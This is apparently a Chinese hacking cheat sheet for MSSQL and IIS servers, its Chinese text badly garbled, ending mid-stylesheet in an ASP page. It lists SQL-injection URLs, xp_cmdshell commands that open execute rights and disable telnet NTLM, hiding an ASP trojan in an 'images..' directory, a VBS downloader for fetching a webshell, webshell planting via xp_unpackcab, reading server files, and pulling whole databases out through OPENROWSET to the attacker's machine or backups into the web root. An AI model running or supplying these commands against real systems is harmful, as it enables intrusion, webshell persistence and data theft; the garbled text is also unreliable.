?   璁﹚in鐩綍鍏鋒湁瑙f瀽asp鑴氭湰鏉冮檺錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?   鍒犻櫎铏氭嫙鐩綍win錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   嫻嬭瘯錛?a target=_blank>http://127.0.0.1/win/test.asp
8錛夊埄鐢⊿QL璇彞鏉ユ煡鎵網(wǎng)EB鐩綍錛氭牴鎹粡楠岋紝鐚滅枒WEB鏍圭洰褰曠殑欏哄簭鏄細(xì)d鐩樸乪鐩樸乧鐩橈紝棣栧厛鎴戜滑寤虹珛涓涓復(fù)鏃惰〃鐢ㄤ簬瀛樻斁master..xp_dirtree(閫傚悎浜巔ublic)鐢熸垚鐨勭洰褰曟爲(wèi),鐢ㄤ互涓嬭鍙ワ細(xì)
;create table temp(dir nvarchar(255),depth varchar(255));--,璇ヨ〃鐨刣ir瀛楁琛ㄧず鐩綍鐨勫悕縐幫紝depth瀛楁琛ㄧず鐩綍鐨勬繁搴︺傜劧鍚庢墽琛寈p_dirtree鑾峰緱D鐩樼殑鐩綍鏍?wèi)锛岃鍙ュ涓嬪Q?
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

鍦ㄨ繘琛屼笅闈㈢殑鎿嶄綔鍓嶏紝鍏堟煡鐪婦鐩樻湁鍑犱釜鏂囦歡澶癸紝榪欐牱瀵笵鐩樻湁涓ぇ鑷寸殑浜?jiǎn)瑙eQ岃鍙ュ涓嬶細(xì)
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?))>=鏁板瓧(鏁板瓧=0銆?銆?銆?...)

鎺ョ潃錛屾垜浠湪瀵規(guī)柟鐨勭綉绔欎笂鎵懼嚑涓竴綰у瓙鐩綍錛屽user銆乸hoto錛岀劧鍚庯紝鐢ㄧ瓫閫夌殑鏂規(guī)硶鏉ュ垽鏂璚EB鏍圭洰褰曚笂鏄惁瀛樺湪姝ょ洏?shù)笂锛岃鍙ュ涓嬪Q?
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

鐪嬭鍙ョ殑榪斿洖緇撴灉錛屽鏋滀負(fù)鐪燂紝琛ㄧずWEB鏍圭洰褰曟湁鍙兘鍦ㄦ鐩樹(shù)笂錛屼負(fù)浜?jiǎn)杩涗竴姝ョ‘璁わ紝澶氭祴璇曞嚑涓瓙鐩綍錛?
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

濡傛灉鎵鏈夌殑嫻嬭瘯緇撴灉閮戒負(fù)鐪燂紝琛ㄧずWEB鏍圭洰褰曞緢鏈夊彲鑳藉湪姝ょ洏?shù)笂銆?

涓嬮潰鍋囪鎵懼埌鐨刉EB鏍圭洰褰曞湪姝ょ洏?shù)笂锛岀敤浠ヤ笅鐨勮鍙ユ潵鑾峰緱涓綰у瓙鐩綍鐨勬繁搴︼細(xì)
and (select depth from temp where dir='user')>=鏁板瓧(鏁板瓧=1銆?銆?...)

鍋囪寰楀埌鐨刣epth鏄?,璇存槑user鐩綍鏄疍鐩樼殑3綰х洰褰曪紝鍒橶EB鏍圭洰褰曟槸D鐩樼殑浜岀駭鐩綍銆?

鐩墠鎴戜滑宸茬粡鐭ラ亾浜?jiǎn)鏍圭洰褰曟墍鍦ㄧ殑鐩樼鍜屾繁搴︼紝瑕佹壘鍒版牴鐩綍鐨勫叿浣撲綅緗紝鎴戜滑鏉ヤ粠D鐩樻牴鐩綍寮濮嬮愪竴鎼滃錛屽綋鐒?dòng)灱屾病鏈夊繀瑕佺煡閬撴瘡涓洰褰曠殑鍚嵖U幫紝鍚﹀垯澶楄垂鏃墮棿浜?jiǎn)銆?

鎺ヤ笅鏉ワ紝鍙﹀寤虹珛涓涓復(fù)鏃惰〃錛岀敤鏉ュ瓨鏀綝鐩樼殑1綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰曪紝璇彞濡備笅錛?

;create table temp1(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑絎竴涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑絎簩涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp1涓紝鍙渶鎶婄浜屼釜top 1鏀逛負(fù)top 2灝辮浜?jiǎn)銆?

鐜板湪錛宼emp1涓凡緇忎繚瀛樹(shù)簡(jiǎn)鎵鏈塂鐩樼涓綰у瓙鐩綍涓嬬殑鎵鏈夌洰褰?鐒跺悗錛屾垜浠敤鍚屾牱鐨勬柟娉曟潵鍒ゆ柇鏍圭洰褰曟槸鍚﹀湪姝や竴綰у瓙鐩綍涓嬶細(xì)
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
濡傛灉榪斿洖涓虹湡錛岃〃紺烘牴鐩綍鍙兘鍦ㄦ瀛愮洰褰曚笅錛岃浣忚澶氭祴璇曞嚑涓緥瀛愶紝濡傛灉閮借繑鍥炰負(fù)鍋囷紝鍒欒〃鏄嶹EB鏍圭洰褰曚笉鍦ㄦ鐩綍涓嬶紝鐒跺悗鎴戜滑鍦ㄧ敤鍚屾牱鐨勬柟娉曟潵鑾峰緱D鐩樼2銆?...涓瓙鐩綍涓嬬殑鎵鏈夌洰褰曞垪琛紝鏉ュ垽鏂璚EB鏍圭洰褰曟槸鍚﹀湪鍏朵笅銆備絾鏄紝瑕佹敞鎰忥紝鐢▁p_dirtree鍓嶄竴瀹氳鎶妕emp1琛ㄤ腑鐨勫唴瀹瑰垹闄ゃ?

鐜板湪鍋囪錛學(xué)EB鏍圭洰褰曞湪D鐩樼殑絎竴綰у瓙鐩綍涓嬶紝璇ュ瓙鐩綍鍚嶇О涓簑ebsite,鎬庢牱鑾峰緱榪欎釜鐩綍鐨勫悕縐版垜鎯充笉鐢ㄦ垜璇翠簡(jiǎn)鍚с傚洜涓哄墠闈㈡垜浠煡閬撲簡(jiǎn)WEB鏍圭洰褰曠殑娣卞害涓?錛屾垜浠渶瑕佺煡閬搘ebsite涓嬪埌搴曞摢涓墠鏄湡姝g殑WEB鏍圭洰褰曘?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曪紝鍐嶅緩绔嬬3涓復(fù)鏃惰〃錛?
;create table temp2(dir nvarchar(255),depth varchar(255));--

鐒跺悗鎶婁粠D鐩樼殑website涓嬬殑鎵鏈夌洰褰曞瓨鍒皌emp2涓紝璇彞濡備笅錛?
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 鍗?) order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
褰撶劧涔熷彲浠ユ妸D鐩樼殑website涓嬬浜屼釜瀛愮洰褰曚笅鐨勬墍鏈夌洰褰曞瓨鍒皌emp2涓紝鍙渶鎶婄浜屼釜top 1鏀逛負(fù)top 2灝辮浜?jiǎn)銆?

鐜板湪錛屾垜浠敤鍚屾牱鐨勬柟娉曞垽鏂鐩綍鏄惁涓烘牴鐩綍錛?
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
濡傛灉榪斿洖涓虹湡錛屼負(fù)浜?jiǎn)纭畾鎴戜滑鐨勫垽鏂Q屽嫻嬭瘯鍑犱釜渚嬪瓙錛屾柟娉曚笂闈㈤兘璁插埌浜?jiǎn)锛屽鏋滃涓緥瀛愰兘杩斿洖湄?fù)鐪燂紝閭d箞灝辯‘瀹氫簡(jiǎn)璇ョ洰褰曚負(fù)WEB鏍圭洰褰曘?


鐢ㄤ互涓婄殑鏂規(guī)硶鍩烘湰涓婂彲浠ヨ幏寰梂EB鏍圭洰褰曪紝鐜板湪鎴戜滑鍋囪W(wǎng)EB鏍圭洰褰曟槸錛欴:\website\www
鐒跺悗錛屾垜浠氨鍙互澶囦喚褰撳墠鏁版嵁搴撳埌榪欎釜鐩綍涓嬬敤鏉ヤ笅杞姐傚浠藉墠鎴戜滑鎶妕emp銆乼emp1銆乼emp2鐨勫唴瀹規(guī)竻絀猴紝鐒跺悗C銆丏銆丒鐩樼殑鐩綍鏍?wèi)鍒嗗埆瀛樺埌temp銆乼emp1銆乼emp2涓?

涓嬭澆瀹屾暟鎹簱鍚庤璁板緱鎶婁笁涓復(fù)鏃惰〃DROP鎺夛紝鐜板湪鎴戜滑鍦ㄤ笅杞界殑鏁版嵁搴撲腑鍙互鎵懼埌鎵鏈夌殑鐩綍鍒楄〃錛屽寘鎷悗鍙扮鐞嗙殑鐩綍浠ュ強(qiáng)鏇村淇℃伅銆?br>
21銆亀in2000涓嬪皢WEB鐢ㄦ埛鎻愬崌涓虹郴緇熺敤鎴鋒潈闄愶紝闇瑕佹湁綆$悊鍛樼殑鏉冮檺鎵嶈兘鎵ц錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

鏌ョ湅鏄惁鎴愬姛錛?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
鐗堟潈鎵鏈?C) Microsoft Corporation 1996-2001銆備繚鐣欐墍鏈夋潈鍒┿?br>inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22銆佸浣曢殣钘廇SP鏈ㄩ┈錛?br>寤虹珛闈炴爣鍑嗙洰褰曪細(xì)mkdir images..\
鎷瘋礉ASP鏈ㄩ┈鑷崇洰褰曪細(xì)copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
閫氳繃web璁塊棶ASP鏈ㄩ┈錛?a href="http://ip/images../news.asp?action=login" target=_blank>http://ip/images../news.asp?action=login
濡備綍鍒犻櫎闈炴爣鍑嗙洰褰曪細(xì)rmdir images..\ /s

23銆佸幓鎺塼enlnet鐨刵tlm璁よ瘉錛?br>;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'鈥?br>
24銆佺敤echo鍐欏叆鏂囦歡涓嬭澆鑴氭湰iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25銆佹墜宸ュ緩绔婭IS闅愯棌鐩綍鐨勬柟娉曪細(xì)
?   鏌ョ湅鏈湴铏氭嫙鐩綍鍒楄〃錛歝script.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   鏂板緩涓涓猭iss鐩綍錛歮kdir c:\asp\kiss
?   寤虹珛kiss铏氭嫙鐩綍錛歝script.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   涓簁iss鐩綍鍔犳墽琛屽拰鍐欐潈闄愶細(xì)
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   璁塊棶錛?a target=_blank>http://127.0.0.1/kiss/test.asp

26銆佷嬌鐢╫penrowset()榪炲洖鏈湴鍋氭祴璇曪細(xì)
-- Loopback query through the SQLOLEDB provider with inline sa credentials (section 26's local
-- test). Defensive notes: OPENROWSET with a connection string needs 'Ad Hoc Distributed Queries'
-- enabled (off by default on SQL Server 2005+), and because the password is part of the
-- statement text it is recorded by traces, the plan cache and any query-logging tool.
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

-- Same query without an alias on the rowset.
SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27銆佽幏寰椾富鏈哄悕錛?br>http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28銆佽幏寰楁暟鎹簱鐢ㄦ埛鍚嶏細(xì)
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29銆佹櫘閫氱敤鎴瘋幏寰梂EBSHELL鐨勬柟娉曚箣浜岋細(xì)
?   鎵撳寘錛?br>EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
瑙e寘錛屽彲浠ョ敤浜庡緱鍒皐ebshell錛?br>?   EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
?   璇諱換鎰忔枃浠跺唴瀹癸紝瑕佹眰鏈塵aster鐨刣bo鏉冮檺錛?br>EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30銆乻a 鏉冮檺涓嬪凡鐭eb璺緞鐩存帴澶囦喚鏁版嵁搴撳埌web璺緞涓?br>
http://www.XXXX.com/FullStory.asp?id=1;backuup database 鏁版嵁搴撳悕 to disk='c:\inetpub\wwwroot\save.db' 鍒欐妸寰楀埌鐨勬暟鎹唴瀹瑰叏閮ㄥ浠藉埌WEB鐩綍涓嬶紝鍐嶇敤HTTP鎶婃鏂囦歡涓嬭澆(褰撶劧棣栭夎鐭ラ亾WEB铏氭嫙鐩綍)銆?br>
?   閬嶅巻緋葷粺鐨勭洰褰曠粨鏋勶紝鍒嗘瀽緇撴灉騫跺彂鐜癢EB铏氭嫙鐩綍錛屽厛鍒涘緩涓涓復(fù)鏃惰〃錛歵emp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?   銆鎺ヤ笅鏉ワ細(xì)鎴戜滑鍙互鍒╃敤xp_availablemedia鏉ヨ幏寰楀綋鍓嶆墍鏈夐┍鍔ㄥ櫒,騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   鎴戜滑鍙互閫氳繃鏌ヨtemp鐨勫唴瀹規(guī)潵鑾峰緱椹卞姩鍣ㄥ垪琛ㄥ強(qiáng)鐩稿叧淇℃伅鎴栬呭埄鐢▁p_subdirs鑾峰緱瀛愮洰褰曞垪琛?騫跺瓨鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
?   鎴戜滑榪樺彲浠ュ埄鐢▁p_dirtree鑾峰緱鎵鏈夊瓙鐩綍鐨勭洰褰曟爲(wèi)緇撴瀯,騫跺鍏emp琛ㄤ腑錛?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 榪欐牱灝卞彲浠ユ垚鍔熺殑嫻忚鍒版墍鏈夌殑鐩綍錛堟枃浠跺す錛夊垪琛?br>?   濡傛灉鎴戜滑闇瑕佹煡鐪嬫煇涓枃浠剁殑鍐呭錛屽彲浠ラ氳繃鎵цxp_cmdsell錛?insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
?   浣跨敤'bulk insert'璇硶鍙互灝嗕竴涓枃鏈枃浠舵彃鍏ュ埌涓涓復(fù)鏃惰〃涓傚錛歜ulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'   嫻忚temp灝卞彲浠ョ湅鍒癷ndex.asp鏂囦歡鐨勫唴瀹逛簡(jiǎn)錛侀氳繃鍒嗘瀽鍚勭ASP鏂囦歡錛屽彲浠ュ緱鍒板ぇ閲忕郴緇熶俊鎭紝W(xué)EB寤鴻涓庣鐞嗕俊鎭紝鐢氳嚦鍙互寰楀埌SA甯愬彿鐨勮繛鎺ュ瘑鐮併?br>
31銆佷竴浜泂ql涓殑鎵╁睍瀛樺偍鐨勬葷粨:
xp_availablemedia 鏄劇ず緋葷粺涓婂彲鐢ㄧ殑鐩樼'C:\' xp_availablemedia
xp_enumgroups 鍒楀嚭褰撳墠緋葷粺鐨勪嬌鐢ㄧ兢緇勫強(qiáng)鍏惰鏄?xp_enumgroups
xp_enumdsn 鍒楀嚭緋葷粺涓婂凡緇忚緗ソ鐨凮DBC鏁版嵁婧愬悕縐?xp_enumdsn
xp_dirtree 鏄劇ず鏌愪釜鐩綍涓嬬殑瀛愮洰褰曚笌鏂囦歡鏋舵瀯 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 鑾峰彇鏌愭枃浠剁殑鐩稿叧灞炴?xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 灝嗙洰鏍囪綆楁満澶氫釜妗f鍘嬬緝鍒版煇涓。妗堥噷鎵鍘嬬緝鐨勬。妗堥兘鍙互鎺ュ湪鍙傛暟鐨勫悗闈㈢敤璞嗗彿闅斿紑 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 瑙e帇緙?xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 鍒楀嚭鏈嶅姟鍣ㄥ煙鍚?xp_ntsec_enumdomains
xp_servicecontrol 鍋滄鎴栬呭惎鍔ㄦ煇涓湇鍔?xp_servicecontrol 'stop','schedule'
xp_terminate_process 鐢╬id鏉ュ仠姝㈡煇涓墽琛屼腑鐨勭▼搴?xp_terminate_process 123
dbo.xp_subdirs 鍙垪鏌愪釜鐩綍涓嬬殑瀛愮洰褰?dbo.xp_subdirs 'C:\'

32銆?br>USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1。获得所有的存储过程的脚本 (script out every stored procedure)：
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2。获得所有的视图的脚本 (script out every view)：
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33銆丏B_OWNER鏉冮檺涓嬬殑鏁版嵁搴撳浠芥柟娉?br>鐢╫penrowset鍚с傚弽榪炲埌鑷繁鐨勬暟鎹簱鏈哄櫒錛寏鍏堝湪鏈湴寤轟釜璺熺洰鏍囨満鍣ㄤ竴鏍風(fēng)粨鏋勭殑琛▇瀛楁綾誨瀷浣跨敤nvarchar.鐒跺悗鐢ㄦ搗媧嬭繛鎺ュ鏂圭殑SQL鏁版嵁搴擄紝鍦ㄦ煡璇㈠垎鏋愰偅閲屾墽琛?br>insert into OPENROWSET ('sqloledb','server=浣犳暟鎹簱鏈嶅姟鍣ㄧ殑IP;uid=user;pwd=pass;database=dbname;','select * from 浣犲緩绔嬬殑琛? select * from 瀵規(guī)柟鐨勮〃鈥?br>瑕佹槸鏁版嵁閲忓お澶х殑璇濆氨鐪嬬湅浠栨暟鎹簱閲屾湁娌℃湁鑷姩緙栧彿鐨勫瓧孌?select * from 琛ㄥ悕 where id>100
榪欐牱鏉ュ紕鍚?br>瑕佹槸鍜學(xué)EB鍚屽彴鐨勮瘽錛岀洿鎺ュ皢搴揃AK鍒癢EB鐩綍涓嬪洖鏉ュ氨O(jiān)K鍟︺傘傘備笉榪囧墠鎻愬簱涓嶈兘澶ぇ錛岃秴榪?G鐨勮瘽SQL灝辮秴鏃朵簡(jiǎn)
濡傛灉鏄疭A鏉冮檺鍙互鍒╃敤涓嬮潰鐨勪袱涓狝SP紼嬪簭鏉ュ浠芥暟鎹簱錛?br>
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?lt;/TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<!-- Backup/restore form: posts act (backup|restore), databasename and bak_file back to this
     same page; the script below uses bak_file verbatim as a server-side file path. -->
<form method="post" name=myform>
閫夋嫨鎿嶄綔錛?lt;INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>澶囦喚</label>銆
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>鎭㈠</label>
<br>鏁版嵁搴撳悕錛?lt;INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>鏂囦歡璺緞錛?lt;INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞,澶囦喚鎴怑XE涓昏涓轰簡(jiǎn)鏂逛究涓嬭澆,媧繪椿..)<br>
<input type="submit" value="紜畾">
</form>
<%
' sqlbackup1.asp: back up or restore a SQL Server database through SQL-DMO, using the
' connection settings hard-coded below and the database / file path chosen in the form.
' Review notes on the script as written:
'  - It logs in as sa with a password embedded in the page source, so any file-read
'    exposure of the page discloses an instance-wide credential. The credential belongs
'    outside the web root, and a backup-only login (db_backupoperator) is sufficient.
'  - databasename and bak_file come straight from the request and are handed to SQL-DMO
'    unchanged, so the caller picks an arbitrary server-side path to write (backup) or
'    read (restore). Both need validation: an allow-list of database names and a fixed
'    backup directory with the file name limited to a safe character set.
'  - No "On Error Resume Next" is visible in this listing, so the err.number checks below
'    cannot run after a SQL-DMO failure (the error aborts the page), and the success
'    message is written unconditionally.
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
' NOTE(review): the next line appears to have lost its line breaks in extraction; in the
' original, sqlname and sqlpassword are separate assignments and the password literal's
' closing quote is garbled. As printed, everything after the first apostrophe is one comment.
sqlserver = "localhost" 'sql鏈嶅姟鍣?br>sqlname = "sa" '鐢ㄦ埛鍚?br>sqlpassword = "鏁版嵁搴撳瘑鐮? '瀵嗙爜
sqlLoginTimeout = 15 ' login timeout
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
' "$1" inside the submitted path stands for the database name.
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
' NOTE(review): Files is never declared or assigned in this page; presumably the SQL-DMO
' device-type constant was intended. As written it evaluates to Empty - confirm.
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
' Written even when the error block above fired.
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act = "restore" then
' Restore must be done while the database is not in use!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
' NOTE(review): same undeclared Files identifier as in the backup branch.
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
' This check runs before SQLRestore is called, so it cannot observe a restore failure.
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>娌℃湁閫夋嫨鎿嶄綔</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   